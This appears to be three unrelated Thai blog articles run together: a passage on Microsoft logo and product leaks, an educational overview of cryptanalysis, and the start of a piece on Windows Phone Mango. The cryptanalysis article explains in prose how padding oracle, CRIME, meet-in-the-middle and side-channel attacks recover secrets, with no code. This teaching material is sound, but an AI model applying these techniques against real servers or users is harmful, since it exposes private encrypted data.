[Nokia](http://www.blognone.com/news/24439/%E0%B9%82%E0%B8%99%E0%B9%80%E0%B8%81%E0%B8%B5%E0%B8%A2%E0%B8%A2%E0%B8%B7%E0%B8%99%E0%B8%A2%E0%B8%B1%E0%B8%99-%E0%B9%84%E0%B8%A1%E0%B9%82%E0%B8%84%E0%B8%A3%E0%B8%8B%E0%B8%AD%E0%B8%9F%E0%B8%97%E0%B9%8C%E0%B8%88%E0%B8%B0%E0%B9%80%E0%B8%9B%E0%B8%A5%E0%B8%B5%E0%B9%88%E0%B8%A2%E0%B8%99%E0%B9%82%E0%B8%A5%E0%B9%82%E0%B8%81%E0%B9%89-windows-phone) ผ่านไปหนึ่งจุดแล้วตรงนี้ไม่ค่อยมีใครสังเกต และก็ไม่เห็นมีข่าวด้วย จบส่วนปี 2011 แค่นี้แล้วกัน เพราะของจริงอยู่ที่ปี 2012 ครับ ### มันซ่อนในวิดีโอของ Windows 8 Release Preview ในวิดีโอนำเสนอ Windows 8 Release Preview ก็ยังคงมีข้อสังเกตอย่างหนึ่งซึ่งไม่มีใครหลายคนแปลกใจ นั่นคือแอพ [Fresh Paint](http://www.blognone.com/node/35375) ซึ่งในวิดีโอนั้นก็หลุดไม่ว่าจะเป็นโลโก้ Fresh Paint และตัวแอพ Fresh Paint เลยทีเดียว ดังภาพและวิดีโอด้านล่าง ผมตั้งข้อสังเกตว่าตอนหลุดนี่ Microsoft ตั้งใจจะสร้างกระแส (หรือเปล่า) แต่กลับไม่ค่อยบูมเท่าที่เห็น ### Surface ปริศนา Microsoft Surface เป็นแท็บเล็ต[สุดยอดจะปริศนา](http://www.blognone.com/node/33345) เพราะนี่ถือว่าเป็นโค้ดลับที่ทาง Microsoft ไม่เคยเปิดเผยมาก่อน แต่พอเปิดเผยแล้วก็ดันมีจุดน่าสังเกตถึง 4 จุดเลยทีเดียว **จุดที่ 1 แอบใบ้ภาพเดสก์ท็อป** เป็นอีกหนึ่งจุดที่ผู้สื่อข่าวทั่วโลกต่างไม่สังเกตว่า ในหน้า Start Screen (ต่อไปนี้ผมจะเรียกว่า dashboard เพื่อให้เข้าใจได้ง่ายขึ้น) จะมี tile ที่จะสามารถกดเพื่อกลับเข้าหน้าเดสก์ท็อป พบว่าตัวภาพ tile นั้นเป็นภาพดอกไม้ ซึ่งภาพนั้นก็คือภาพบน Windows 8 RTM และก็พึ่งมาเป็นข่าวตอน [build 9200](http://www.blognone.com/node/34507) หลุดมานั่นเอง **จุดที่ 2 SkyDrive โลโก้ใหม่** SkyDrive ถือว่าเป็นหนึ่งในแอพที่พบเห็นบ่อยใน Windows 8 และจุดนี้ถือว่า Microsoft ดันพลาดที่เผลอปล่อยภาพโลโก้ใหม่ของ SkyDrive ไปพร้อม ๆ กับภาพแรกของ Surface แน่นอนว่าภาพนี้มาก่อนข่าวที่ Microsoft ประกาศ[เปลี่ยนโลโก้ SkyDrive](http://www.blognone.com/node/34131) เสียอีก **จุดที่ 3 Windows Store โลโก้ใหม่** ตอนที่ทาง Microsoft เผยโฉม [Windows 8 Developer Preview](http://www.blognone.com/news/24061/%E0%B9%84%E0%B8%A1%E0%B9%82%E0%B8%84%E0%B8%A3%E0%B8%8B%E0%B8%AD%E0%B8%9F%E0%B8%97%E0%B9%8C%E0%B8%9E%E0%B8%A3%E0%B8%B5%E0%B8%A7%E0%B8%B4%E0%B8%A7-windows-8-%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%99-steven-sinofsky-%E0%B8%82%E0%B8%B6%E0%B9%89%E0%B8%99%E0%B9%80%E0%B8%A7%E0%B8%97%E0%B8%B5%E0%B8%99%E0%B8%B3%E0%B9%80%E0%B8%AA%E0%B8%99%E0%B8%AD%E0%B9%83%E0%B8%99%E0%B8%87%E0%B8%B2%E0%B8%99-d9) ไปก็จะพบว่าไอคอน Windows Store ออกมาค่อนข้างดูดีเลยทีเดียว แต่ทีนี้ตอนที่ Microsoft เปิดตัว Surface ทุกสิ่งที่ Microsoft ตั้งใจปิดเป็นความลับก็กลับเปิดเผยขึ้น เมื่อไอคอนบน tile ของ Windows Store เปลี่ยนใหม่เฉียงตามสไตล์โลโก้ Windows 8 ซึ่งส่วนตัวมองว่ามัน "ไม่มีความสวยงามเลยแม้แต่น้อย" และทุกคนก็ได้เห็นภาพนี้อย่างเป็นทางการเมื่อตอนที่เปิดตัว [Windows Phone 8](http://www.blognone.com/node/33489) ครับ **สรุป** จะเห็นได้ว่า Surface กลับมีโค้ดลับที่ซ่อนไว้ในตัวภาพแค่ภาพเดียวค่อนข้างเยอะพอสมควร และทั้งหมดคาดว่า Microsoft ยอมหลุดเพื่อตอนเปิดตัว Windows 8 อย่างเป็นทางการจะได้ไม่ต้องแก้ไข artwork อีก (ซึ่งถ้าข้อสันนิษฐานนี้เป็นจริงก็คือทีมงาน artwork ของ Microsoft คงขี้เกียจ) ส่วนจุดที่ 4 อยู่ในหัวข้อต่อไป ### สารพัดหลุดโลโก้ใหม่ Microsoft การที่ทาง Microsoft ปล่อยวิดีโอแนะนำ Surface ก็มีอีกหนึ่งจุดที่ถือว่า Microsoft เผลอ (หรือตั้งใจ) หลุดเพื่อให้ผู้บริโภครับทราบถึงโลโก้ใหม่ของ Microsoft ก็ได้ และถือว่าเป็นครั้งแรกที่ Microsoft แอบปล่อยภาพแรกของโลโก้ใหม่สู่สาธารณชน ดังวิดีโอข้างล่างนี้ ต่อจากนั้น ทิ้งระยะไว้พอสมควร Microsoft ก็เผยโฉม [Microsoft Hardware รุ่นใหม่ 2 ตระกูล](http://www.blognone.com/node/34567) และเหมือนเดิมคือ ตัวอักษรใหม่ของ Microsoft โผล่ และผมก็ตั้งข้อสังเกตว่า Microsoft เตรียมจะเปลี่ยนโลโก้ (ดูได้ที่[คอมเมนต์นี้](http://www.blognone.com/node/34567#comment-450645)) และก็ถึงเวลาที่ [Microsoft เปลี่ยนโลโก้จริง ๆ](http://www.blognone.com/node/35349) ปริศนาทั้งหมดก็ถูกคล้ายปม ในแบบที่เรียกว่า ไม่มีข่าวลือเลยก็ว่าได้ ### Hotmail, Newmail หรือ [Outlook.com](http://outlook.com/)? หนึ่งในประเด็นที่สร้างความสับสนให้แก่ผู้~เสพ~อ่านข่าวถึงหน้าตา [Hotmail รูปแบบใหม่](http://www.blognone.com/node/33192) ซึ่งตอนแรกก็ใช้ชื่อ Hotmail อยู่ดี ๆ ปรากฏว่ามีอีกข่าวบอกว่าใช้ชื่อ [Newmail](http://www.blognone.com/node/33241) และก็มีมือดีชื่อบริษัท [HOSTMASTER CORP. จดโดเมน Newmail ไปเรียบร้อย](http://www.checkdomain.com/cgi-bin/checkdomain.pl?domain=newmail.com) สุดท้าย Microsoft ประกาศเปิดตัว [Outlook.com](http://www.blognone.com/node/34617) ซะแทน และมีแววว่าจะเปลี่ยนชื่อจาก [Hotmail เป็น Outlook.com](http://www.blognone.com/node/34619) แต่ข้อสังเกตกลับไม่ใช่แค่นั้น เพราะว่าถ้าลองเข้าไปที่เว็บไซต์ [http://newmail.live.com](http://newmail.live.com/) ก็กลับโยงเข้าไปยัง Hotmail หรือ [Outlook.com](http://outlook.com/) ซึ่งก็เป็นไปได้ว่า Microsoft จะใช้ชื่อ Newmail อีกครั้ง นับว่าเป็นเคสที่สร้างความสับสนได้มากเลยทีเดียว เพราะขนาดจะเข้า [Outlook.com](http://outlook.com/) ก็สามารถเข้าได้ที่ [http://outlook.live.com](http://outlook.live.com/) ได้เลย ### "เพื่อนทั้งหมดเปลี่ยนร่างหมดแล้ว เหลือแค่แกแล้ว Bing" อีกหนึ่งข้อสงสัยสุด ๆ คือ นับตั้งแต่ที่ Microsoft ประกาศเปลี่ยนโลโก้ของ Windows Phone และ Windows Azure หลายท่านก็คงได้เห็นโลโก้ที่เปลี่ยนแค่สี อย่าง Xbox และ Bing ซึ่งตรงนี้หลายท่านก็คงไม่แปลกใจเท่าไหร่ แต่เมื่อ Microsoft ประกาศเผยโฉมโลโก้ใหม่ของบริษัท หลายคนก็สงสัยแล้วว่า สีเหลืองที่ต้องเป็น Bing มันหายไปจากตอนแนะนำผลิตภัณฑ์ได้อย่างไร ซึ่งนั่นก็อาจจะหมายถึงว่า Microsoft เตรียมเปลี่ยนโลโก้ของ Bing แล้ว ### บทส่งท้าย : รหัสลับยังคงมีต่อไป แม้ว่าหลายท่านอาจจะเห็นว่าบทวิเคราะห์นี่ได้เผยไต๋ถึงรหัสลับทั้งหมดของ Microsoft (เท่าที่ผมนึกได้นะ) แต่ความจริงแล้วมันอาจจะมีรหัสลับซ่อนอยู่อีกในอนาคต (ผมวิเคราะห์ว่ามันน่าจะมีอีก แต่ก็ไม่แน่นะครับ) และถ้ามีโอกาส (ที่ผมจ้องจับผิดได้) จะวิเคราะห์รหัสลับกันต่อในตอนหน้าครับ สำหรับวันนี้ต้องลาไปก่อน สวัสดีครับ
# Cryptanalysis ศาสตร์แห่งการถอดรหัส กระบวนการเข้ารหัสที่มีอยู่ในโลกมากมายและถูกพัฒนาอย่างต่อเนื่องจนทุกวันนี้ซับซ้อนในระดับที่ต้องการความรู้คณิตศาสตร์ระดับสูง เหตุผลสำคัญของการพัฒนาเหล่านี้คือการแข่งขันกับกระบวนการถอดรหัสที่พัฒนาอย่างต่อเนื่องเช่นเดียวกันศาสตร์ที่ว่าด้วยการถอดรหัสนี้เรียกว่า Cryptanalysis เป็นศาสตร์ที่อยู่คู่กับการเข้ารหัสมานาน เทคนิคและกระบวนการก็ซับซ้อนและใช้ในกรณีเฉพาะบางอย่างไปเรื่อยๆ ในบทความนี้เราจะยกตัวอย่างบางเทคนิคที่ใช้กันในการถอดรหัส ## ความถี่ของข้อมูล (Frequency Counting) นับตั้งแต่การเข้ารหัสของซีซาร์เมื่อสองพันปีก่อน ที่เข้ารหัสง่ายๆ ด้วยการแทนตัวอักษรตามตารางลับทำให้ข้อความอ่านไม่ออก การโจมตีที่ง่ายที่สุดคือการดูว่าตัวอักษรที่ถูกใช้งานมากที่สุดคือตัวอักษรใด แล้วแทนตัวอักษรนั้นด้วยตัว e ตัวที่รองลงมาน่าจะเป็น t หรือ a ไปตามลำดับ การแทนตัวอักษรตามตารางของซีซาร์นั้นแสดงให้เห็นปัญหาของการเข้ารหัสข้อความเดิมแล้วได้ผลของการเข้ารหัสที่เหมือนเดิม เมื่อข้อมูลใหญ่ขึ้นเรื่อยๆ เราจะเห็นปัญหาของการเข้ารหัสเช่นนี้ เช่นภาพตัวอย่าง กระบวนการนับความถี่อาศัยความจริงพื้นฐานว่าข้อมูลที่เราเข้ารหัสไปนั้นมักมีข้อมูลบางรูปแบบที่ใช้ซ้ำไปบ่อยกว่าข้อมูลแบบอื่นๆ ทุกวันนี้ แม้การใช้งานอินเทอร์เน็ตจะซับซ้อนกว่าตัวอักษร 26 ตัวอักษรแล้ว แต่รูปแบบการใช้งานยังคงคล้ายเดิมอย่างมาก เราจะพบว่าข้อความบางรูปแบบถูกใช้ซ้ำไปมา รูปแบบของการนับความถี่ในยุคใหม่พัฒนาไปจากเดิมมาก เนื่องจากการเข้ารหัสยุคใหม่ๆ นั้นไม่ปล่อยให้ข้อมูลที่เหมือนเดิมเข้ารหัสแล้วได้ข้อความเดิมอีกต่อไปแล้ว การนับความถี่อาจจะอาศัยข้อมูล เช่น ขนาดของข้อมูล, ระยะเวลาของห้วงการส่งข้อมูลแต่ละครั้ง (time interval) สิ่งเหล่านี้แม้ไม่ได้เปิดเผยข้อมูลภายในตัวมันเอง แต่สามารถนำไปสังเกตเพื่อหาข้อมูลเพิ่มเติมบางอย่างได้ เช่น ผู้ร้ายที่ดักฟังข้อมูลอยู่ อาจจะคาดเดาได้ว่ามีการเปิดหน้าเว็บใด แม้จะเชื่อมต่อ VPN ไว้ก็ตามที ## Brute-Force กระบวนการเข้ารหัสที่ถูกต้องแม้จะใช้พลังประมวลผลในการเข้ารหัส ต่ำกว่าพลังประมวลผลสำหรับการเข้ารหัสอย่างมาก แต่หลายครั้งที่พลังประมวลผลเพื่อถอดรหัสกลับไม่ได้สูงจนกระทั่งคนทั่วไป (หรือหน่วยงานที่มีทุนสูงเช่นรัฐบาล) จะสามารถจัดหาได้ การโจมตีแบบ Brute-Force ที่สำคัญคือการโจมตีอัลกอริธึม DES ที่มีขนาดกุญแจ 56 บิต หลังจากที่ไอบีเอ็มได้ออกแบบให้ใช้กุญแจขนาด 112 บิตในตอนแรก และถูกร้องขอโดย NSA (เจ้าของเดียวกับ PRISM และ XKeyscore) ให้ลดขนาดกุญแจเหลือครึ่งเดียวโดย DES กลายเป็นมาตรฐานในปี 1975 และถูกใช้เข้ารหัสฐานข้อมูลจำนวนมาก ทั้งข้อมูลทางการเงิน, สมาร์ตการ์ด, และเอกสารลับของรัฐบาล โดยตัวคุณสมบัติทางคณิตศาสตร์เอง DES ไม่ได้มีปัญหาอะไรมากนัก นอกจากขนาดกุญแจที่เล็กเกินไป และคอมพิวเตอร์มีความเร็วเพิ่มขึ้นอย่างรวดเร้ว ภายในเวลาเพียง 20 ปี DES ก็ถูกถอดรหัสได้ภายในไม่กี่วันด้วยคอมพิวเตอร์เฉพาะทางราคา 220,000 ดอลลาร์ แสดงให้เห็นว่ามันอ่อนแอเกินไปที่จะรักษาข้อมูลที่มีมูลค่าสูง การถอดรหัสแบบ Brute-Force คือ การทดลองทุกกุญแจที่เป็นไปได้ แล้วนำมาถอดรหัสข้อมูลลับดูว่าจะได้ผลว่าอย่างไร แต่ความยากของกระบวนการเช่นนี้ คือกุญแจทุกชุดที่นำมาถอดรหัสนั้นล้วนใช้งานได้ทั้งสิ้น และสามารถถอดรหัสออกมาเป็นข้อมูลอีกชุด กระบวนการที่ยากอย่างหนึ่งคือการตรวจสอบผลลัพธ์ว่าเราได้พบกับข้อมูลที่ถูกต้องแล้วหรือไม่ ดังนั้นแม้จะสามารถไล่ทุกกุญแจได้อย่างรวดเร็ว แต่ก็ต้องมีความรู้เกี่ยวกับข้อมูลอยู่บ้าง เช่น ไฟล์หลายชนิดมักกำหนดข้อมูล checksum เพื่อตรวจสอบความถูกต้องของไฟล์ไว้ หากถอดรหัสแล้วสามารถตรวจค่า checksum ได้ถูกต้องก็แสดงว่าเราเจอกับกุญแจที่ถูกต้องแล้ว บทเรียนที่สำคัญอย่างหนึ่งของ DES คือการประมาณเวลารักษาข้อมูลด้วยการเข้ารหัส ทุกวันนี้เรามักเห็นการประมาณเวลาการโจมตีการเข้ารหัสไว้ว่าใช้เวลาในการถอดรหัสด้วยซีพียูเป็นเวลานานเท่าใด แม้ส่วนมากมักใช้เวลาเกิน 10 ปี ในซีพียูรุ่นใหม่ล่าสุด แต่กระบวนการพัฒนาซีพียูที่ทำความเร็วเพิ่มขึ้นในรูปแบบ exponential ทำให้ซีพียูจะมีพลังประมวลผลเร็วขึ้นสองเท่าในช่วงเวลาประมาณ 18 เดือนเท่านั้น การประมาณเวลาว่าจะใช้เวลาถอดรหัสถึงสิบปี จะเหลือระยะเวลาถอดรหัสเพียง 5 ปีเมื่อใช้ซีพียูรุ่นใหม่ในอีก 18 เดือนข้างหน้า และเหลือ 2.5 ปีในอีกสามปีข้างหน้าเท่านั้น แนวทางการใช้เทคโนโลยีรูปแบบใหม่ๆ เช่น ระบบประมวลผลแบบกลุ่มเมฆก็เป็นปัจจัยต่อการเข้ารหัส ในยุคหนึ่งการซื้อคอมพิวเตอร์นับพันๆ ตัวเพื่อถอดรหัสเป็นเรื่องที่ใช้ต้นทุนสูง และผู้กระทำต้องเป็นองค์กรที่มีทุนสูงเท่านั้น แต่ทุกวันนี้ประมวลผลแบบกลุ่มเมฆทำให้คนทั่วไปที่มีทุนอยู่บ้าง สามารถเข้าถึงฮาร์ดแวร์จำนวนมากมายได้โดยไม่ต้องลงทุนค่าเครื่องเอง เมื่อระยะเวลาถอดรหัสด้วยกุญแจที่ใช้พลังประมวลผลถึงสิบปี จะใช้เวลาไม่ถึงวันหากใช้เครื่องจำนวนมากประมวลผลขนานกันสี่ถึงห้าพันเครื่อง ซึ่งอาจเช่าใช้ได้ทันทีด้วยเงินทุนเพียงไม่กี่แสนบาท ## Known Plaintext การเข้ารหัสนั้นมักจะตั้งสมมติฐานว่าคนที่เราไม่ต้องการให้รู้ข้อความนั้นไม่รู้ข้อความอยู่ก่อนหน้า (ไม่อย่างนั้นเราจะเข้ารหัสทำไม?) และไม่รู้กุญแจลับที่เราใช้เข้ารหัส แต่จะเกิดอะไรขึ้นถ้าผู้โจมตีกลับรับรู้ข้อความอยู่ก่อนแล้ว ในกรณีของการเข้ารหัสแบบซีซาร์ การที่ผู้โจมตีรู้ข้อความอยู่ก่อนจะทำให้ความลับที่ใช้เข้ารหัสคือตารางแปลงอักษรหลุดออกมาทันที ผู้โจมตีสามารถสร้างตารางแทนตัวอักษรของซีซาร์ได้โดยง่าย การใช้งานข้อความที่รู้อยู่ก่อนแล้วถูกใช้งานจริงจังเมื่อการถอดรหัส enigma ในช่วงสงครามโลกครั้งที่สอง นักวิเคราะห์พบว่าข้อความส่วนมากที่ส่งด้วย enigma นั้นคือเลข 1 หรือ *eins* โดยมีคำนี้อยู่ในข้อความถึงร้อยละ 90 แสดงว่าเมื่อเราถอดรหัสออกมาได้แล้วก็ให้ลองหาคำว่า eins นี้ดู ถ้าพบแสดงว่าข้อความน่าจะถูกต้องแล้ว Alan Turing สร้าง eins catalogue เพื่อเตรียมข้อความที่เข้ารหัสคำว่า eins ในทุกรูปแบบของกุญแจเครื่อง enigma นำไปสู่การถอดรหัสในที่สุด ข้อความที่รู้อยู่ก่อนนั้นเกิดขึ้นได้ในหลายรูปแบบ ในกรณีของสงครามโลกครั้งที่สอง ทหารเยอรมันส่งข้อความที่ไม่สำคัญนักไปยังศูนย์กลางโดยการเข้ารหัสอื่นๆ นอกจาก enigma จากนั้นศูนย์จึงส่งกลับฐานทัพด้วย enigma อีกครั้ง ฝ่ายสัมพันธมิตรจึงสามารถรับรู้ข้อความก่อนและหลังเข้ารหัสด้วย enigma ได้ การใช้งานที่ซับซ้อนขึ้น เช่น ในยุคของการออกแบบ DES ใหม่ให้มีความปลอดภัยสูงขึ้น มีผู้เสนอกระบวนการ 2DES คือการเข้ารหัสด้วย DES สองรอบ โดยใช้กุญแจขนาด 112 บิต กระบวนการนี้ดูมีความปลอดภัยดีเพราะ DES เองก็ไม่มีปัญหาอื่นนอกจากขนาดกุญแจเล็กเกินไป ปรากฏว่าในกรณีที่ผู้โจมตีรู้ข้อความอยู่ก่อน เขาสามารถสร้างข้อความในทุกกรณีด้วยกุญแจขนาด 56 บิต ได้คลังขนาด 2^56 กรณีเตรียมไว้ก่อนได้ และถอดรหัสข้อความที่เข้ารหัสแล้วด้วยกุญแจขนาด 56 บิตอีกรอบแล้วนำไปค้นดูในคลัง ว่ามีกุญแจที่รู้อยู่ก่อนแล้วหรือไม่ กระบวนการเช่นนี้ทำให้ความยุ่งยากของการคำนวณอยู่ในระดับ 2^57 ซึ่งไม่ดีกว่ากุญแจ DES เดิมมากนัก ชื่อเรียกเฉพาะของการโจมตีเช่นนี้เรียกว่า meet-in-the-middle attack ## Padding Oracle: บางครั้งเซิร์ฟเวอร์ก็สร้างปัญหา กระบวนการโจมตีในรูปแบบใหม่ๆ ที่กระบวนการทางคณิตศาสตร์ได้รับการพัฒนาไปมาก แต่กลับมีการใช้งานในรูปแบบที่หลากหลายขึ้น กระบวนการที่สำคัญได้แก่ padding oracle มันอาศัยการใช้งานในกรณีที่ผู้ใช้ทั่วไปสามารถถือข้อความที่เข้ารหัสแล้ว แต่ไม่รู้ว่าข้อความนั้นคืออะไร และมีเซิร์ฟเวอร์รับข้อความเข้ารหัสเพื่อส่งผลลัพธ์ของข้อความที่เข้ารหัสนั้น ในโหมดการเข้ารหัสแบบ block cipher ในโหมด CBC นั้นกำหนดให้ส่งค่าเริ่มต้นการเชื่อมต่อ (initial vector - IV) เป็นค่าสุ่มและส่งออกมาอย่างเปิดเผย จากนั้นจึงใช้ค่านี้ไป XOR กับข้อมูล "ก่อนเข้ารหัส" ในกระบวนการถอดรหัส และ "หลังถอดรหัส" ในกระบวนการถอดรหัส (ดูภาพ) จากนั้นจึงใช้ข้อความที่เข้ารหัสแล้ว ไปใช้ XOR เช่นเดิมกับบล็อคต่อๆ ไป กระบวนการนี้ทำให้ข้อความแม้จะเหมือนเดิม แต่หากค่า IV ต่างกันก็จะได้ข้อความที่ต่างกันไป ในกระบวนการแบบ CBC นั้น โปรโตคอล TLS ระบุให้สามารถส่งข้อความยาวเท่าใดก็ได้โดยไม่ต้องสนใจขนาดบล็อคของแต่ละอัลกอลิทึม เนื่องจากแต่ละอัลกอลิทึมมีขนาดบล็อคต่างกันไป โดยเมื่อส่งข้อมูลทุกครั้ง จะต้องลงท้ายข้อมูล (padding) ด้วยข้อมูลที่ระบุว่ามีกี่ไบต์ที่ไม่ใช้งาน เช่น บล็อคขนาด 8 ไบต์ แต่ต้องการส่งข้อมูล 7 ไบต์ จะต้องส่งข้อมูลเป็น \\x01 ต่อท้าย เช่น "\\xAB\\xAB\\xAB\\xAB\\xAB\\xAB\\xAB\\x01" หรือแม้แต่ข้อมูลที่ขนาดเท่าบล็อคพอดีก็ต้องเพิ่มอีกหนึ่งบล็อคเป็นข้อมูลเติมเต็มเสมอ เช่น "\\xAB\\xAB\\xAB\\xAB\\xAB\\xAB\\xAB\\xAB\\x08\\x08\\x08\\x08\\x08\\x08\\x08\\x08" เป็นข้อมูลในกรณีที่บล็อคเข้ารหัสมีขนาด 8 ไบต์และต้องการส่งข้อมูลขนาด 8 ไบต์พอดี ในกรณีบล็อคแรกแม้ผู้โจมตีจะรู้เสมอว่าค่า IV และข้อมูลที่เข้ารหัสแล้วเป็นอะไร แต่เนื่องจากไม่รู้กุญแจการเข้าและถอดรหัส ทำให้ไม่รู้ค่าตรงกลางหลังจากข้อมูลถอดรหัสแล้ว ก่อนที่จะมา XOR กับค่า IV กระบวนการเช่นนี้ใช้มานานและดูจะปลอดภัยดี จนกระทั่งพบว่าเซิร์ฟเวอร์จำนวนมาก มักส่งข้อความตอบกลับแจ้งว่าข้อมูลต่อท้ายนั้นผิดพลาด (invalid padding) แทนที่จะโจมตีการเข้ารหัสโดยตรง ผู้โจมตี เลือกที่จะตัดเฉพาะบล็อคแรกออกมา แล้วส่งไปใหม่ 256 ครั้ง โดยเปลี่ยนไบต์สุดท้ายของค่า IV ให้มีค่าที่เป็นไปได้ทุกกรณีจำนวน 256 ค่า เกือบทุกค่าเซิร์ฟเวอร์จะแจ้งกลับว่าข้อมูลต่อท้ายนั้นผิดพลาดเสมอ ยกเว้นกรณีที่ไบต์สุดท้ายเป็นค่า \\x01 พอดี ที่เซิร์ฟเวอร์จะตอบกลับว่าข้อมูลนี้ถูกต้องแล้ว (มีกรณีอื่นที่เซิร์ฟเวอร์ตอบถูกต้องเช่นกัน คือกรณีไบต์รองสุดท้าย เป็น \\x02 พอดี และข้อมูลในไบต์สุดท้ายเป็น \\x02 ด้วย แต่กรณีเหล่านั้นมีความเป็นไปได้น้อย และตัดออกได้ง่าย) การตอบว่าข้อมูลถูกต้อง ทำให้ผู้โจมตีรับรู้ได้ทันทีว่าค่าตรงกลางหลังการถอดรหัสแล้วคือค่าอะไร และเมื่อไปดูค่า IV ดั้งเดิมที่ถูกต้อง เขาก็รู้ได้เช่นกันว่าข้อความเดิมก่อนเข้ารหัสในไบต์สุดท้ายคืออะไร เมื่อผู้โจมตีรู้ค่าของไบต์สุดท้ายแล้ว เขาสามารถวนไปยังไบต์รองสุดท้ายเพื่อเปลี่ยนค่า IV เป็นอีก 256 กรณีได้เช่นเดิม โดยเปลี่ยนค่าของไบต์สุดท้ายให้ถอดรหัสได้ \\x02 เตรียมไว้ล่วงหน้า เมื่อวนเช่นนี้ครบทั้งบล็อคก็จะถอดรหัสทั้งบล็อคได้ การถอดรหัสบล็อคต่อไปก็อาศัยการเปลี่ยนข้อความที่เข้ารหัสแล้วเช่นเดิมไปเรื่อยๆ โดยส่งข้อมูลหาเซิร์ฟเวอร์เพิ่มทีละบล็อค ## Side-Channel Attack: มันไม่เกี่ยวทำให้เกี่ยวยังไงไหว โลกของงานวิจัยการถอดรหัสในช่วงสิบปีที่ผ่านมาก้าวหน้าไปอย่างรวดเร็ว หัวข้องานวิจัยใหม่ๆ เริ่มปรากฏกรณีที่ไม่เคยมีคนคิดมาก่อน กระบวนการสำคัญคือการคิดถึงปัจจัยที่ไม่เคยคิดกันมาก่อน เช่น การใช้ขนาดของข้อมูลหลังการเข้ารหัส, พลังงานที่ใช้ในการเข้ารหัส, หรือระยะเวลาการเข้ารหัส การใช้ขนาดของข้อมูลเป็นประเด็นสำคัญอย่างมากในช่วงหลัง เนื่องจากความซับซ้อนของโปรโตคอลอย่าง HTTP เริ่มมีมากขึ้นเรื่อยๆ มีการใช้มาตรฐานต่างๆ ประกอบกันมากมาย ในกระบวนการโจมตี CRIME อาศัยการบีบอัดข้อมูลของ TLS จากความสามารถของเบราว์เซอร์ที่เปิดให้เว็บหนึ่งๆ สามารถควบคุมเบราว์เซอร์ให้เรียกเว็บอื่นๆ ได้อย่างอิสระ พร้อมกับใส่ข้อมูลที่ต้องการเข้าไปได้ เว็บที่โจมตีเว็บอื่นด้วย CRIME จึงใส่ข้อมูลที่คาดว่าจะมีอยู่ในเนื้อหาของเว็บปลายทาง เช่น คำว่า "Cookie:" เข้าไปในข้อความที่เรียก แล้วดูผลลัพธ์ว่าขนาดผลลัพธ์มีขนาดเท่าใด จากนั้นจึงค่อยๆ เพิ่มทีละตัวอักษรว่าข้อมูลมีขนาดเพิ่มขึ้นหรือเท่าเดิม หากเท่าเดิมแสดงว่ากระบวนการบีบอัดข้อมูลทำงาน และตัวอักษรที่เพิ่มขึ้นนั้นถูกต้องดีแล้ว กระบวนการวิเคราะห์พลังงานในการเข้ารหัสนั้น แม้จะไม่ได้ใช้ในระบบคอมพิวเตอร์ทั่วไปที่เราเข้าวัดพลังงานโดยตรงไม่ได้ แต่ในระบบการเข้ารหัสใหม่ๆ เช่น สมาร์ตการ์ด ผู้โจมตีสามารถเข้าวัดพลังงานของคอมพิวเตอร์ในการ์ดได้อย่างแม่นยำ กระบวนการนี้อาศัยการวิเคราะห์ว่ากุญแจเข้ารหัสแบบใดจะใช้พลังงานต่างกันมากน้อยเพียงใด เพื่อพยายามเดากุญแจการเข้ารหัสภายในตัวการ์ดที่ไม่สามารถอ่านได้ การอาศัยเวลานั้นคล้ายกับการวิเคราะห์พลังงาน คือ เมื่อเราตรวจสอบกระบวนการเข้ารหัสแล้ว เราสามารถดูได้ว่ากุญแจรูปแบบใดน่าจะทำให้ระยะเวลาการเข้ารหัสนั้นสั้นยาวต่างกัน กระบวนการนี้สามารถใช้ได้กับการใช้งานแบบเซิร์ฟเวอร์ที่เรารอระยะตอบกลับได้อีกด้วย แต่เครือข่ายต้องมีความเสถียรสูงมาก เพื่อจะวัดระยะเวลาตอบกลับจากเซิร์ฟเวอร์ได้อย่างแม่นยำ โลกของกระบวนการถอดรหัสยังมีกระบวนการอื่นๆ อีกมากมาย กระบวนการใหม่ๆ ยังได้รับการเสนอออกมาอย่างต่อเนื่อง และการแก้ไขเองก็มีออกมาไล่กันไปสำหรับคนส่วนใหญ่แม้จะเป็นนักพัฒนาก็ตาม มักจะอยู่ในฐานะผู้ใช้ของกระบวนการเหล่านี้ เราควรติดตามข่าวสารของเทคนิคใหม่ๆ และแนวทางแก้ไขหรือลดปัญหาที่มักจะมีออกมาใกล้ๆ กัน
# เห็นอะไรใน Mango ตอนงาน Google I/O ผมเขียนเรื่อง [ทิศทางที่เริ่มแจ่มชัดของ Android และ Chrome OS](http://www.blognone.com/news/23704) ไปแล้ว คราวนี้[งานแถลงข่าว Windows Phone Mango](http://www.blognone.com/news/23861) ก็อยากเขียนบทความลักษณะเดียวกันสักหน่อย เพื่อความเข้าใจที่ดีขึ้น อาจจะต้องย้อนไปอ่าน [Windows Phone 7: ก้าวที่ไม่หวือหวา แต่เป็นก้าวที่สำคัญของไมโครซอฟท์](http://www.blognone.com/news/19148) ซึ่งเขียนเมื่อเดือนตุลาคมปีที่แล้ว เมื่อครั้งที่ Windows Phone 7 เปิดตัวอย่างเป็นทางการ ผมมีประเด็นที่อยากนำเสนอ 4 ข้อ **1) พัฒนาการของ Windows Phone** ถึงแม้ไมโครซอฟท์จะโฆษณาว่า Windows Phone "Mango" จะมีฟีเจอร์เพิ่มขึ้นถึง 500 อย่าง แต่สังเกตว่าไม่มีฟีเจอร์ใหญ่มากนัก (ใหญ่สุดน่าจะเป็น IE9) **ซึ่งเป็นทิศทางที่ถูกต้องแล้ว** ตามที่เขียนไว้ในบทความชิ้นก่อน Windows Phone 7 ถือเป็นการ "รีเซ็ต" ตัวเองของแพลตฟอร์ม Windows บนอุปกรณ์พกพา ซึ่งไมโครซอฟท์เองก็ทำการบ้านมาดี มีแนวทางการออกแบบที่ล้ำสมัยหลายอย่าง ตัวแกนหลักของแพลตฟอร์มเปิดตัวมาได้น่าสนใจ แต่ฟีเจอร์รายละเอียดปลีกย่อยที่ยังทำไม่ทัน ก็ทำให้ WP7 ลดความน่าสนใจลงไปเยอะในช่วงแรก เช่น มัลติทาสกิง, ความเร็วการตอบสนอง, การเชื่อมต่อกับ Twitter ฯลฯ ไมโครซอฟท์ใช้เวลา 7 เดือนนับจาก WP7 รุ่นแรกมาถึง Mango ผ่านช่วงเวลาขลุกขลักพอสมควรกับ NoDo แต่พอมาถึง Mango ก็แก้ปัญหาปลีกย่อยไปแล้วหลายอย่าง ไม่ว่าจะเป็นเรื่อง API, อัพเกรดเบราว์เซอร์, [ปรับปรุงเครื่องมือพัฒนา](http://www.blognone.com/news/23871) ฯลฯ 